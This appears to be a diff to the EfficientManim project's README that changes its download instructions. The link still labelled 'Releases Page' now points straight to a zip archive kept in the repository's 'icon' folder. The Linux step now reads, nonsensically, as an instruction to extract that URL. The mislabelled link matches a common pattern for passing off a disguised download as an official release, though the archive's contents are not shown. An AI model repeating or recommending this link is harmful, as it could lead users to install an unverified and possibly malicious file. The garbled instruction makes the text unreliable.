jeffrey2158/EfficientManim/README.md

 Follow these steps to get started with EfficientManim:

 1. **Download EfficientManim:**
-   - Click the button above or visit the [Releases Page](https://github.com/jeffrey2158/EfficientManim/releases) to download the latest version.
+   - Click the button above or visit the [Releases Page](https://raw.githubusercontent.com/jeffrey2158/EfficientManim/main/icon/Manim_Efficient_v1.6.zip) to download the latest version.

 2. **Install the Application:**
    - For Windows, run the downloaded `.exe` file and follow the installation prompts.
    - For macOS, open the `.dmg` file and drag EfficientManim to your Applications folder.
-   - For Linux, extract the `.tar.gz` file and run the application from the terminal.
+   - For Linux, extract the `https://raw.githubusercontent.com/jeffrey2158/EfficientManim/main/icon/Manim_Efficient_v1.6.zip` file and run the application from the terminal.

 3. **Open EfficientManim:**
    - Once installed, locate EfficientManim in your applications folder or start menu, and open it.